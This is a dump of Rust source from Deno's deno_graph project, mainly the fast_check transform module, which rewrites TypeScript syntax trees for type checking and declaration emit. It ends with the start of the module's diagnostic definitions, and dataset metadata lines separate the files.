Pat::Ident(binding_id) => Some(TsFnParam::Ident(binding_id)),
Pat::Array(arr_pat) => Some(TsFnParam::Array(arr_pat)),
Pat::Rest(rest_pat) => Some(TsFnParam::Rest(rest_pat)),
Pat::Object(obj) => Some(TsFnParam::Object(obj)),
Pat::Assign(assign_pat) => self
.expr_to_ts_type(*assign_pat.right, false, false)
.map(|param| {
let name = if let Pat::Ident(ident) = *assign_pat.left {
ident.id.sym.clone()
} else {
self.gen_unique_name().into()
};
TsFnParam::Ident(BindingIdent {
id: Ident::new(name, assign_pat.span, Default::default()),
type_ann: Some(type_ann(param)),
})
}),
Pat::Expr(expr) => {
self.mark_diagnostic_unable_to_infer(expr.range());
None
}
// Invalid code is invalid, not sure why SWC doesn't throw
// a parse error here.
Pat::Invalid(_) => None,
}
}
}
fn valid_prop_name(prop_name: &PropName) -> Option<PropName> {
fn prop_name_from_expr(expr: &Expr) -> Option<PropName> {
match expr {
Expr::Lit(e) => match &e {
Lit::Str(e) => Some(PropName::Str(e.clone())),
Lit::Num(e) => Some(PropName::Num(e.clone())),
Lit::BigInt(e) => Some(PropName::BigInt(e.clone())),
Lit::Bool(_) | Lit::Null(_) | Lit::Regex(_) | Lit::JSXText(_) => None,
},
Expr::Tpl(e) => {
if e.quasis.is_empty() && e.exprs.len() == 1 {
prop_name_from_expr(&e.exprs[0])
} else {
None
}
}
Expr::Paren(e) => prop_name_from_expr(&e.expr),
Expr::TsTypeAssertion(e) => prop_name_from_expr(&e.expr),
Expr::TsConstAssertion(e) => prop_name_from_expr(&e.expr),
Expr::TsNonNull(e) => prop_name_from_expr(&e.expr),
Expr::TsAs(e) => prop_name_from_expr(&e.expr),
Expr::TsSatisfies(e) => prop_name_from_expr(&e.expr),
Expr::Ident(_) => Some(PropName::Computed(ComputedPropName {
#[allow(clippy::disallowed_methods)]
span: deno_ast::swc::common::Spanned::span(&expr),
expr: Box::new(expr.clone()),
})),
Expr::TaggedTpl(_)
| Expr::This(_)
| Expr::Array(_)
| Expr::Object(_)
| Expr::Fn(_)
| Expr::Unary(_)
| Expr::Update(_)
| Expr::Bin(_)
| Expr::Assign(_)
| Expr::Member(_)
| Expr::SuperProp(_)
| Expr::Cond(_)
| Expr::Call(_)
| Expr::New(_)
| Expr::Seq(_)
| Expr::Arrow(_)
| Expr::Class(_)
| Expr::Yield(_)
| Expr::Await(_)
| Expr::MetaProp(_)
| Expr::JSXMember(_)
| Expr::JSXNamespacedName(_)
| Expr::JSXEmpty(_)
| Expr::JSXElement(_)
| Expr::JSXFragment(_)
| Expr::TsInstantiation(_)
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | true |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/fast_check/transform.rs | src/fast_check/transform.rs | // Copyright 2018-2024 the Deno authors. MIT license.
// for span methods, which actually make sense to use here in the transforms
#![allow(clippy::disallowed_methods)]
#![allow(clippy::disallowed_types)]
use std::collections::HashSet;
use std::sync::Arc;
use deno_ast::EmitOptions;
use deno_ast::ModuleSpecifier;
use deno_ast::MultiThreadedComments;
use deno_ast::ParsedSource;
use deno_ast::ProgramRef;
use deno_ast::SourceMap;
use deno_ast::SourceRange;
use deno_ast::SourceRangedForSpanned;
use deno_ast::emit;
use deno_ast::swc::ast::*;
use deno_ast::swc::common::DUMMY_SP;
use deno_ast::swc::common::Spanned;
use deno_ast::swc::common::SyntaxContext;
use deno_ast::swc::common::comments::CommentKind;
use deno_ast::swc::common::comments::SingleThreadedComments;
use deno_ast::swc::common::comments::SingleThreadedCommentsMapInner;
use deno_ast::swc::ecma_visit::VisitWith;
use indexmap::IndexMap;
use crate::ModuleGraph;
use crate::WorkspaceMember;
use crate::analysis::ModuleInfo;
use crate::ast::ParserModuleAnalyzer;
use crate::symbols::EsModuleInfo;
use crate::symbols::ExpandoPropertyRef;
use crate::symbols::Symbol;
use super::FastCheckDiagnostic;
use super::FastCheckDiagnosticRange;
use super::range_finder::ModulePublicRanges;
use super::swc_helpers::DeclMutabilityKind;
use super::swc_helpers::ReturnStatementAnalysis;
use super::swc_helpers::analyze_return_stmts_in_function_body;
use super::swc_helpers::any_type_ann;
use super::swc_helpers::is_void_type;
use super::swc_helpers::maybe_lit_to_ts_type;
use super::swc_helpers::new_ident;
use super::swc_helpers::ts_keyword_type;
use super::transform_dts::FastCheckDtsDiagnostic;
use super::transform_dts::FastCheckDtsTransformer;
pub struct CommentsMut {
leading: SingleThreadedCommentsMapInner,
trailing: SingleThreadedCommentsMapInner,
}
impl CommentsMut {
pub fn new(single_threaded: SingleThreadedComments) -> Self {
fn prune_comments(comments: &mut SingleThreadedCommentsMapInner) {
comments.retain(|_key, value| {
value.retain(|c| {
match c.kind {
// only keep js docs and @ts-* comments
CommentKind::Line => c.text.trim_start().starts_with("@ts-"),
CommentKind::Block => c.text.starts_with('*'),
}
});
!value.is_empty()
});
}
let (leading, trailing) = single_threaded.take_all();
let mut leading = leading.take();
let mut trailing = trailing.take();
prune_comments(&mut leading);
prune_comments(&mut trailing);
Self { leading, trailing }
}
pub fn remove_leading(&mut self, start: deno_ast::SourcePos) {
self.leading.remove(&start.as_byte_pos());
}
pub fn into_multi_threaded(self) -> MultiThreadedComments {
MultiThreadedComments::from_leading_and_trailing(
self.leading,
self.trailing,
)
}
}
#[derive(Debug, Clone)]
pub struct FastCheckDtsModule {
pub program: Program,
pub comments: MultiThreadedComments,
pub diagnostics: Vec<FastCheckDtsDiagnostic>,
}
#[derive(Debug)]
pub struct FastCheckModule {
pub module_info: Arc<ModuleInfo>,
pub text: Arc<str>,
pub source_map: Arc<str>,
pub dts: Option<FastCheckDtsModule>,
}
pub struct TransformOptions<'a> {
pub workspace_members: &'a [WorkspaceMember],
pub should_error_on_first_diagnostic: bool,
pub dts: bool,
}
pub fn transform(
graph: &ModuleGraph,
es_module_info: &EsModuleInfo,
public_ranges: &ModulePublicRanges,
options: &TransformOptions,
) -> Result<FastCheckModule, Vec<FastCheckDiagnostic>> {
let mut transformer = FastCheckTransformer::new(
graph,
es_module_info,
public_ranges,
options.should_error_on_first_diagnostic,
);
let (module, comments) = transformer.transform()?;
if !transformer.diagnostics.is_empty() {
return Err(transformer.diagnostics);
}
let parsed_source = es_module_info.source();
let specifier = es_module_info.specifier();
let module_info = ParserModuleAnalyzer::module_info_from_swc(
parsed_source.media_type(),
ProgramRef::Module(&module),
parsed_source.text_info_lazy(),
&comments,
);
// swc will modify the comment collection internally when emitting,
// so if we're emitting with dts, make a copy of the comments for
// each emit
let (fast_check_comments, dts_comments) = if options.dts {
(comments.as_single_threaded(), Some(comments))
} else {
(comments.into_single_threaded(), None)
};
// now emit
let source_map =
SourceMap::single(specifier.clone(), parsed_source.text().to_string());
let emitted_source = emit(
ProgramRef::Module(&module),
&fast_check_comments,
&source_map,
&EmitOptions {
remove_comments: false,
source_map: deno_ast::SourceMapOption::Separate,
source_map_base: None,
source_map_file: None,
inline_sources: false,
},
)
.map_err(|e| {
vec![FastCheckDiagnostic::Emit {
specifier: specifier.clone(),
inner: Arc::new(e),
}]
})?;
let emitted_text = emitted_source.text;
let dts = if let Some(dts_comments) = dts_comments {
let mut dts_transformer = FastCheckDtsTransformer::new(
parsed_source.text_info_lazy(),
public_ranges,
specifier,
);
let program = dts_transformer.transform(Program::Module(module));
Some(FastCheckDtsModule {
program,
comments: dts_comments,
diagnostics: dts_transformer.diagnostics,
})
} else {
None
};
Ok(FastCheckModule {
module_info: module_info.into(),
text: emitted_text.into(),
dts,
source_map: emitted_source.source_map.unwrap().into(),
})
}
enum TransformItemResult {
/// Retain the item as is.
Retain,
/// Remove the item.
Remove,
}
impl TransformItemResult {
fn from_retain(retain: bool) -> Self {
if retain { Self::Retain } else { Self::Remove }
}
}
struct FastCheckTransformer<'a> {
graph: &'a ModuleGraph,
specifier: &'a ModuleSpecifier,
es_module_info: &'a EsModuleInfo,
public_ranges: &'a ModulePublicRanges,
parsed_source: &'a ParsedSource,
should_error_on_first_diagnostic: bool,
diagnostics: Vec<FastCheckDiagnostic>,
expando_namespaces: IndexMap<Id, Vec<VarDeclarator>>,
}
impl<'a> FastCheckTransformer<'a> {
pub fn new(
graph: &'a ModuleGraph,
es_module_info: &'a EsModuleInfo,
public_ranges: &'a ModulePublicRanges,
should_error_on_first_diagnostic: bool,
) -> Self {
Self {
graph,
specifier: es_module_info.specifier(),
es_module_info,
public_ranges,
parsed_source: es_module_info.source(),
should_error_on_first_diagnostic,
diagnostics: Default::default(),
expando_namespaces: Default::default(),
}
}
pub fn transform(
&mut self,
) -> Result<
(deno_ast::swc::ast::Module, MultiThreadedComments),
Vec<FastCheckDiagnostic>,
> {
let is_ambient = self.parsed_source.media_type().is_declaration();
let program = self.parsed_source.program_ref();
let mut comments =
CommentsMut::new(self.parsed_source.comments().as_single_threaded());
// gracefully handle a script
let mut module = match program {
ProgramRef::Module(module) => module.clone(),
ProgramRef::Script(script) => Module {
span: script.span,
body: script
.body
.iter()
.map(|stmt| ModuleItem::Stmt(stmt.clone()))
.collect(),
shebang: script.shebang.clone(),
},
};
module.body = self.transform_module_body(
std::mem::take(&mut module.body),
&mut comments,
is_ambient,
)?;
Ok((module, comments.into_multi_threaded()))
}
fn transform_module_body(
&mut self,
body: Vec<ModuleItem>,
comments: &mut CommentsMut,
is_ambient: bool,
) -> Result<Vec<ModuleItem>, Vec<FastCheckDiagnostic>> {
let parent_expando_namespaces =
std::mem::take(&mut self.expando_namespaces);
let mut final_body = Vec::with_capacity(body.len());
for mut item in body {
let result = self.transform_item(&mut item, comments, is_ambient)?;
match result {
TransformItemResult::Retain => final_body.push(item),
TransformItemResult::Remove => {
comments.remove_leading(item.start());
}
}
}
// Add accumulated namespaces
final_body.reserve(self.expando_namespaces.len());
for (swc_id, var_decls) in
std::mem::take(&mut self.expando_namespaces).drain(..)
{
let symbol = self.es_module_info.symbol_from_swc(&swc_id).unwrap();
for decl in &var_decls {
self.check_expando_property_diagnostics(decl, &swc_id, symbol)?;
}
// typescript requires the export keyword to match the other
// declarations so only add an export keyword if the other
// decls have one and also we don't want to export something
// that's not exported
let has_export_keyword = symbol.decls().iter().any(|d| {
d.maybe_node()
.map(|n| n.has_export_keyword())
.unwrap_or(false)
});
let module_decl = Decl::TsModule(Box::new(TsModuleDecl {
span: DUMMY_SP,
declare: false,
global: false,
namespace: true,
id: TsModuleName::Ident(Ident::new(
swc_id.0,
DUMMY_SP,
SyntaxContext::default(),
)),
body: Some(TsNamespaceBody::TsModuleBlock(TsModuleBlock {
span: DUMMY_SP,
body: vec![ModuleItem::ModuleDecl(ModuleDecl::ExportDecl(
ExportDecl {
span: DUMMY_SP,
decl: Decl::Var(Box::new(VarDecl {
span: DUMMY_SP,
ctxt: SyntaxContext::empty(),
kind: VarDeclKind::Var,
declare: false,
decls: var_decls,
})),
},
))],
})),
}));
final_body.push(if has_export_keyword {
ModuleItem::ModuleDecl(ModuleDecl::ExportDecl(ExportDecl {
span: DUMMY_SP,
decl: module_decl,
}))
} else {
ModuleItem::Stmt(Stmt::Decl(module_decl))
});
}
self.expando_namespaces = parent_expando_namespaces;
Ok(final_body)
}
fn check_expando_property_diagnostics(
&mut self,
decl: &VarDeclarator,
parent_id: &Id,
parent_symbol: &Symbol,
) -> Result<(), Vec<FastCheckDiagnostic>> {
struct VisitExpandoPropInits<'a> {
symbol: &'a Symbol,
parent_context: SyntaxContext,
diagnostics: IndexMap<String, SourceRange>,
}
impl deno_ast::swc::ecma_visit::Visit for VisitExpandoPropInits<'_> {
fn visit_ident(&mut self, ident: &Ident) {
let (name, context) = ident.to_id();
if context == self.parent_context && self.symbol.export(&name).is_some()
{
self.diagnostics.insert(name.to_string(), ident.range());
}
}
}
let mut inits = VisitExpandoPropInits {
symbol: parent_symbol,
parent_context: parent_id.1,
diagnostics: Default::default(),
};
decl.init.visit_with(&mut inits);
for (reference_name, range) in inits.diagnostics {
self.mark_diagnostic(
FastCheckDiagnostic::UnsupportedExpandoProperty {
object_name: parent_id.0.to_string(),
reference_name,
range: self.source_range_to_range(range),
},
)?;
}
Ok(())
}
fn transform_module_specifier(&mut self, src: &mut Str) {
// only do this for relative specifiers (specifiers to specifiers within the package)
let specifier = src.value.to_string_lossy();
if !specifier.starts_with('.') {
return;
}
let Some(resolved_specifier) =
self
.graph
.resolve_dependency(&specifier, self.specifier, true)
else {
return;
};
if let Some(relative) = self.specifier.make_relative(resolved_specifier) {
if !relative.starts_with("../") {
src.value = format!("./{}", relative).into();
} else {
src.value = relative.into();
}
src.raw = None;
}
}
fn transform_item(
&mut self,
item: &mut ModuleItem,
comments: &mut CommentsMut,
is_ambient: bool,
) -> Result<TransformItemResult, Vec<FastCheckDiagnostic>> {
match item {
ModuleItem::ModuleDecl(decl) => match decl {
ModuleDecl::Import(n) => {
n.specifiers
.retain(|s| self.public_ranges.contains(&s.range()));
let retain = !n.specifiers.is_empty();
if retain {
self.transform_module_specifier(&mut n.src);
}
Ok(TransformItemResult::from_retain(retain))
}
ModuleDecl::ExportNamed(n) => {
n.specifiers
.retain(|s| self.public_ranges.contains(&s.range()));
let retain = !n.specifiers.is_empty();
if retain && let Some(src) = &mut n.src {
self.transform_module_specifier(src);
}
Ok(TransformItemResult::from_retain(retain))
}
ModuleDecl::ExportAll(n) => {
let retain = self.public_ranges.contains(&n.range());
if retain {
self.transform_module_specifier(&mut n.src);
}
Ok(TransformItemResult::from_retain(retain))
}
ModuleDecl::ExportDefaultExpr(n) => {
// todo: investigate why both these checks are needed
if !self.public_ranges.contains(&n.range())
&& !self.public_ranges.contains(&n.expr.range())
{
return Ok(TransformItemResult::Remove);
}
if self.maybe_transform_expr_if_leavable(&mut n.expr, None)?
|| is_expr_ident_or_member_idents(&n.expr)
{
Ok(TransformItemResult::Retain)
} else {
self.mark_diagnostic(
FastCheckDiagnostic::UnsupportedDefaultExportExpr {
range: self.source_range_to_range(n.range()),
},
)?;
Ok(TransformItemResult::Remove)
}
}
ModuleDecl::ExportDefaultDecl(n) => {
if !self.public_ranges.contains(&n.range()) {
return Ok(TransformItemResult::Remove);
}
let node_range = n.range();
self.transform_default_decl(
&mut n.decl,
comments,
node_range,
is_ambient,
)
}
ModuleDecl::ExportDecl(n) => {
let export_decl_range = n.range();
self.transform_decl(
&mut n.decl,
comments,
Some(export_decl_range),
is_ambient,
)
}
ModuleDecl::TsImportEquals(n) => match &n.module_ref {
TsModuleRef::TsEntityName(_) => {
let retain = self.public_ranges.contains(&n.range());
Ok(TransformItemResult::from_retain(retain))
}
TsModuleRef::TsExternalModuleRef(_) => {
self.mark_diagnostic(FastCheckDiagnostic::UnsupportedRequire {
range: self.source_range_to_range(n.range()),
})?;
Ok(TransformItemResult::Remove)
}
},
ModuleDecl::TsExportAssignment(n) => {
self.mark_diagnostic(
FastCheckDiagnostic::UnsupportedTsExportAssignment {
range: self.source_range_to_range(n.range()),
},
)?;
Ok(TransformItemResult::Remove)
}
ModuleDecl::TsNamespaceExport(n) => {
self.mark_diagnostic(
FastCheckDiagnostic::UnsupportedTsNamespaceExport {
range: self.source_range_to_range(n.range()),
},
)?;
Ok(TransformItemResult::Remove)
}
},
ModuleItem::Stmt(stmt) => match stmt {
Stmt::Decl(n) => self.transform_decl(n, comments, None, is_ambient),
Stmt::Expr(n) => match &mut *n.expr {
Expr::Assign(assign_expr) => self.transform_assign_expr(assign_expr),
_ => Ok(TransformItemResult::Remove),
},
Stmt::Block(_)
| Stmt::Empty(_)
| Stmt::Debugger(_)
| Stmt::With(_)
| Stmt::Return(_)
| Stmt::Labeled(_)
| Stmt::Break(_)
| Stmt::Continue(_)
| Stmt::If(_)
| Stmt::Switch(_)
| Stmt::Throw(_)
| Stmt::Try(_)
| Stmt::While(_)
| Stmt::DoWhile(_)
| Stmt::For(_)
| Stmt::ForIn(_)
| Stmt::ForOf(_) => Ok(TransformItemResult::Remove),
},
}
}
fn transform_default_decl(
&mut self,
default_decl: &mut DefaultDecl,
comments: &mut CommentsMut,
parent_range: SourceRange,
is_ambient: bool,
) -> Result<TransformItemResult, Vec<FastCheckDiagnostic>> {
match default_decl {
DefaultDecl::Class(n) => {
(self.transform_class(
&mut n.class,
comments,
/* has declare keyword */ false,
)?);
Ok(TransformItemResult::Retain)
}
DefaultDecl::Fn(n) => {
self.transform_fn(
&mut n.function,
n.ident.as_ref().map(|i| i.range()),
FunctionKind::DeclarationLike,
self.public_ranges.is_impl_with_overloads(&parent_range),
is_ambient,
)?;
Ok(TransformItemResult::Retain)
}
DefaultDecl::TsInterfaceDecl(_) => Ok(TransformItemResult::Retain),
}
}
fn transform_decl(
&mut self,
decl: &mut Decl,
comments: &mut CommentsMut,
parent_range: Option<SourceRange>,
is_ambient: bool,
) -> Result<TransformItemResult, Vec<FastCheckDiagnostic>> {
let public_range = parent_range.unwrap_or_else(|| decl.range());
match decl {
Decl::Class(n) => {
if !self.public_ranges.contains(&public_range) {
return Ok(TransformItemResult::Remove);
}
self.transform_class(
&mut n.class,
comments,
is_ambient || n.declare,
)?;
Ok(TransformItemResult::Retain)
}
Decl::Fn(n) => {
if !self.public_ranges.contains(&public_range) {
return Ok(TransformItemResult::Remove);
}
let is_overload =
self.public_ranges.is_impl_with_overloads(&public_range);
self.transform_fn(
&mut n.function,
Some(n.ident.range()),
FunctionKind::DeclarationLike,
is_overload,
is_ambient,
)?;
Ok(TransformItemResult::Retain)
}
Decl::Var(n) => self.transform_var(n, is_ambient || n.declare),
Decl::TsInterface(_) => Ok(TransformItemResult::from_retain(
self.public_ranges.contains(&public_range),
)),
Decl::TsTypeAlias(_) => Ok(TransformItemResult::from_retain(
self.public_ranges.contains(&public_range),
)),
Decl::TsEnum(_) => Ok(TransformItemResult::from_retain(
self.public_ranges.contains(&public_range),
)),
Decl::TsModule(m) => self.transform_ts_module(
m,
&public_range,
comments,
is_ambient || m.declare || m.global,
),
Decl::Using(n) => {
if self.public_ranges.contains(&public_range)
|| n
.decls
.iter()
.any(|d| self.public_ranges.contains(&d.range()))
{
self.mark_diagnostic(FastCheckDiagnostic::UnsupportedUsing {
range: self.source_range_to_range(
n.decls
.first()
.map(|n| n.range())
.unwrap_or_else(|| n.range()),
),
})?;
}
Ok(TransformItemResult::Remove)
}
}
}
fn transform_class(
&mut self,
n: &mut Class,
comments: &mut CommentsMut,
is_ambient: bool,
) -> Result<(), Vec<FastCheckDiagnostic>> {
if is_ambient {
// ignore private computed members
n.body.retain(|m| !is_ts_private_computed_class_member(m));
return Ok(());
}
let mut members = Vec::with_capacity(n.body.len());
let mut had_private = false;
if let Some(super_class) = &n.super_class
&& !is_expr_ident_or_member_idents(super_class)
{
self.mark_diagnostic(FastCheckDiagnostic::UnsupportedSuperClassExpr {
range: self.source_range_to_range(n.super_class.range()),
})?;
}
let mut insert_members = Vec::new();
let mut had_private_constructor = false;
let mut seen_ts_private_methods = HashSet::new();
for mut member in std::mem::take(&mut n.body) {
had_private = had_private
|| matches!(
member,
ClassMember::PrivateMethod(_)
| ClassMember::PrivateProp(_)
| ClassMember::AutoAccessor(AutoAccessor {
key: Key::Private(_),
..
})
);
let mut retain = !is_ts_private_computed_class_member(&member);
if retain {
// do some extra checks to see whether it should be removed
if let ClassMember::Constructor(ctor) = &member {
if ctor.accessibility == Some(Accessibility::Private) {
if had_private_constructor {
retain = false;
} else if is_ambient || ctor.body.is_some() {
had_private_constructor = true;
} else {
retain = false;
}
}
} else if let ClassMember::Method(method) = &member
&& method.accessibility == Some(Accessibility::Private)
{
let key = match &method.key {
PropName::Ident(i) => Some(i.sym.to_string()),
PropName::Str(s) => Some(s.value.to_string_lossy().to_string()),
PropName::Num(n) => Some(
n.raw
.as_ref()
.map(|r| r.to_string())
.unwrap_or_else(|| n.value.to_string()),
),
PropName::Computed(_) => None,
PropName::BigInt(n) => Some(
n.raw
.as_ref()
.map(|r| r.to_string())
.unwrap_or_else(|| n.value.to_string()),
),
};
retain = match key {
Some(key) => seen_ts_private_methods.insert(key),
None => false,
};
}
}
if retain {
retain = self.transform_class_member(
&mut member,
&mut insert_members,
is_ambient,
)?;
}
if retain {
members.push(member);
} else {
comments.remove_leading(member.start());
}
}
if had_private {
insert_members.insert(
0,
ClassMember::PrivateProp(PrivateProp {
span: DUMMY_SP,
key: PrivateName {
span: DUMMY_SP,
name: "private".into(),
},
ctxt: SyntaxContext::default(),
value: None,
type_ann: Some(Box::new(TsTypeAnn {
span: DUMMY_SP,
type_ann: Box::new(ts_keyword_type(
TsKeywordTypeKind::TsUnknownKeyword,
)),
})),
is_static: false,
decorators: Default::default(),
accessibility: Default::default(),
is_optional: false,
is_override: false,
readonly: false,
definite: true,
}),
)
}
n.body = insert_members.into_iter().chain(members).collect();
n.decorators.clear();
Ok(())
}
fn transform_class_member(
&mut self,
member: &mut ClassMember,
insert_members: &mut Vec<ClassMember>,
is_ambient: bool,
) -> Result<bool, Vec<FastCheckDiagnostic>> {
match member {
ClassMember::Constructor(n) => {
if let Some(body) = &mut n.body {
body.stmts.retain_mut(|stmt| match stmt {
Stmt::Expr(e) => match &mut *e.expr {
Expr::Call(c) => {
if !matches!(c.callee, Callee::Super(_)) {
return false;
}
for arg in c.args.iter_mut() {
arg.expr = if arg.spread.is_some() {
paren_expr(array_as_never_array_expr())
} else {
obj_as_never_expr()
};
}
true
}
_ => false,
},
_ => false,
});
}
for param in &mut n.params {
match param {
ParamOrTsParamProp::Param(_) => {
// ignore
}
ParamOrTsParamProp::TsParamProp(prop) => {
let is_optional = match &prop.param {
TsParamPropParam::Ident(ident) => ident.optional,
TsParamPropParam::Assign(_) => false,
};
insert_members.push(ClassMember::ClassProp(ClassProp {
span: DUMMY_SP,
key: match &prop.param {
TsParamPropParam::Ident(binding_ident) => {
PropName::Ident(IdentName {
span: binding_ident.span,
sym: binding_ident.sym.clone(),
})
}
TsParamPropParam::Assign(assign) => match &*assign.left {
Pat::Ident(binding_ident) => PropName::Ident(IdentName {
span: binding_ident.span,
sym: binding_ident.sym.clone(),
}),
Pat::Array(_)
| Pat::Rest(_)
| Pat::Object(_)
| Pat::Assign(_)
| Pat::Invalid(_)
| Pat::Expr(_) => {
self.mark_diagnostic(
FastCheckDiagnostic::UnsupportedDestructuring {
range: self
.source_range_to_range(assign.left.range()),
},
)?;
return Ok(false);
}
},
},
value: None,
type_ann: if prop.accessibility == Some(Accessibility::Private)
{
Some(any_type_ann())
} else {
match &prop.param {
TsParamPropParam::Ident(ident) => ident.type_ann.clone(),
TsParamPropParam::Assign(assign) => {
let explicit_type_ann = match &*assign.left {
Pat::Ident(binding_ident) => {
binding_ident.type_ann.clone()
}
_ => None,
};
explicit_type_ann.or_else(|| {
self
.maybe_infer_type_from_expr(
&assign.right,
match prop.readonly {
true => DeclMutabilityKind::Const,
false => DeclMutabilityKind::Mutable,
},
)
.map(|type_ann| {
Box::new(TsTypeAnn {
span: DUMMY_SP,
type_ann: Box::new(type_ann),
})
})
})
}
}
},
is_static: false,
decorators: Vec::new(),
accessibility: match prop.accessibility {
Some(Accessibility::Public) | None => None,
Some(accessibility) => Some(accessibility),
},
is_abstract: false,
is_optional,
is_override: false,
readonly: prop.readonly,
declare: true,
definite: false,
}));
*param = ParamOrTsParamProp::Param(Param {
span: prop.span,
decorators: vec![],
pat: match prop.param.clone() {
TsParamPropParam::Ident(ident) => Pat::Ident(ident),
TsParamPropParam::Assign(pat) => Pat::Assign(pat),
},
});
}
}
}
if n.accessibility == Some(Accessibility::Private) {
n.params.clear();
return Ok(true);
}
let is_overload = self.public_ranges.is_impl_with_overloads(&n.range());
if is_overload {
for (i, param) in n.params.iter_mut().enumerate() {
if param.as_param().map(|p| p.pat.is_rest()).unwrap_or(false) {
*param = ParamOrTsParamProp::Param(Param {
span: DUMMY_SP,
decorators: Vec::new(),
pat: Pat::Rest(RestPat {
span: DUMMY_SP,
dot3_token: DUMMY_SP,
type_ann: Some(any_type_ann()),
arg: Box::new(Pat::Ident(BindingIdent {
id: Ident {
span: DUMMY_SP,
ctxt: SyntaxContext::default(),
sym: format!("param{}", i).into(),
optional: false,
},
type_ann: None,
})),
}),
});
} else {
*param = ParamOrTsParamProp::Param(Param {
span: DUMMY_SP,
decorators: Vec::new(),
pat: Pat::Ident(BindingIdent {
id: Ident {
span: DUMMY_SP,
ctxt: SyntaxContext::default(),
sym: format!("param{}", i).into(),
optional: true,
},
type_ann: Some(any_type_ann()),
}),
});
}
}
}
let optional_start_index =
ParamsOptionalStartIndex::build(n.params.iter().map(|p| match p {
ParamOrTsParamProp::Param(p) => &p.pat,
// should have been converted to a param
ParamOrTsParamProp::TsParamProp(_) => unreachable!(),
}));
for (i, param) in n.params.iter_mut().enumerate() {
match param {
ParamOrTsParamProp::Param(param) => {
self.handle_param_pat(
&mut param.pat,
optional_start_index.is_optional_at_index(i),
)?;
param.decorators.clear();
}
ParamOrTsParamProp::TsParamProp(_) => {
// should have been converted to a param
unreachable!();
}
}
}
Ok(true)
}
ClassMember::Method(n) => {
if n.accessibility == Some(Accessibility::Private) {
*member = ClassMember::ClassProp(ClassProp {
span: DUMMY_SP,
key: n.key.clone(),
value: None,
type_ann: Some(any_type_ann()),
is_static: n.is_static,
decorators: Vec::new(),
accessibility: Some(Accessibility::Private),
is_abstract: n.is_abstract,
is_optional: n.is_optional,
is_override: false,
readonly: false,
declare: true,
definite: false,
});
return Ok(true);
}
let is_overload = self.public_ranges.is_impl_with_overloads(&n.range());
self.transform_fn(
&mut n.function,
Some(n.key.range()),
match n.kind {
MethodKind::Method => FunctionKind::DeclarationLike,
MethodKind::Getter => FunctionKind::Getter,
MethodKind::Setter => FunctionKind::Setter,
},
is_overload,
is_ambient,
)?;
Ok(true)
}
ClassMember::ClassProp(n) => {
if n.accessibility == Some(Accessibility::Private) {
n.type_ann = Some(any_type_ann());
n.declare = true;
n.definite = false;
n.is_override = false;
n.value = None;
return Ok(true);
}
if n.type_ann.is_none() {
let inferred_type = n.value.as_ref().and_then(|e| {
self.maybe_infer_type_from_expr(
e,
match n.readonly {
true => DeclMutabilityKind::Const,
false => DeclMutabilityKind::Mutable,
},
)
});
match inferred_type {
Some(t) => {
n.type_ann = Some(Box::new(TsTypeAnn {
span: DUMMY_SP,
type_ann: Box::new(t),
}));
n.value = None;
}
None => {
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | true |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/fast_check/mod.rs | src/fast_check/mod.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use std::borrow::Cow;
use std::sync::Arc;
use crate::ModuleSpecifier;
use deno_ast::EmitError;
use deno_ast::SourceRange;
use deno_ast::SourceTextInfo;
use deno_ast::diagnostics::DiagnosticLevel;
use deno_ast::diagnostics::DiagnosticLocation;
use deno_ast::diagnostics::DiagnosticSnippet;
use deno_ast::diagnostics::DiagnosticSnippetHighlight;
use deno_ast::diagnostics::DiagnosticSnippetHighlightStyle;
use deno_ast::diagnostics::DiagnosticSourcePos;
use deno_ast::diagnostics::DiagnosticSourceRange;
mod cache;
mod range_finder;
mod swc_helpers;
mod transform;
mod transform_dts;
pub use cache::FastCheckCache;
pub use cache::FastCheckCacheItem;
pub use cache::FastCheckCacheKey;
pub use cache::FastCheckCacheModuleItem;
pub use cache::FastCheckCacheModuleItemDiagnostic;
pub use cache::FastCheckCacheModuleItemInfo;
pub use transform::FastCheckDtsModule;
pub use transform::FastCheckModule;
pub use transform::TransformOptions;
#[derive(Clone)]
pub struct FastCheckDiagnosticRange {
pub specifier: ModuleSpecifier,
pub range: SourceRange,
pub text_info: SourceTextInfo,
}
impl std::fmt::Debug for FastCheckDiagnosticRange {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
f.debug_struct("FastCheckDiagnosticRange")
.field("specifier", &self.specifier)
.field("range", &self.range)
.field("text_info", &"<omitted>")
.finish()
}
}
impl PartialEq for FastCheckDiagnosticRange {
fn eq(&self, other: &Self) -> bool {
self.specifier == other.specifier
&& self.range.start == other.range.start
&& self.range.end == other.range.end
}
}
impl Eq for FastCheckDiagnosticRange {}
impl std::hash::Hash for FastCheckDiagnosticRange {
fn hash<H: std::hash::Hasher>(&self, state: &mut H) {
self.specifier.hash(state);
self.range.start.hash(state);
self.range.end.hash(state);
}
}
#[derive(Debug, Clone, thiserror::Error)]
pub enum FastCheckDiagnostic {
#[error("could not resolve '{name}' referenced from '{referrer}'")]
NotFoundReference {
range: FastCheckDiagnosticRange,
name: String,
referrer: String,
},
#[error("missing explicit type in the public API")]
MissingExplicitType { range: FastCheckDiagnosticRange },
#[error("missing explicit return type in the public API")]
MissingExplicitReturnType {
range: FastCheckDiagnosticRange,
is_definitely_void_or_never: bool,
is_async: bool,
},
#[error(
"found an ambient module, which is a global augmentation, which are not unsupported"
)]
UnsupportedAmbientModule { range: FastCheckDiagnosticRange },
#[error("the reference '{name}' from '{referrer}' was too complex")]
UnsupportedComplexReference {
range: FastCheckDiagnosticRange,
name: String,
referrer: String,
},
#[error("default export expression was too complex")]
UnsupportedDefaultExportExpr { range: FastCheckDiagnosticRange },
#[error("found destructuring, which is not supported in the public API")]
UnsupportedDestructuring { range: FastCheckDiagnosticRange },
#[error(
"expando property referencing '{reference_name}' conflicts with '{object_name}.{reference_name}'"
)]
UnsupportedExpandoProperty {
object_name: String,
reference_name: String,
range: FastCheckDiagnosticRange,
},
#[error("found global augmentations, which are not supported")]
UnsupportedGlobalModule { range: FastCheckDiagnosticRange },
#[error(
"require statements are a CommonJS feature, which are not supported in ES modules"
)]
UnsupportedRequire { range: FastCheckDiagnosticRange },
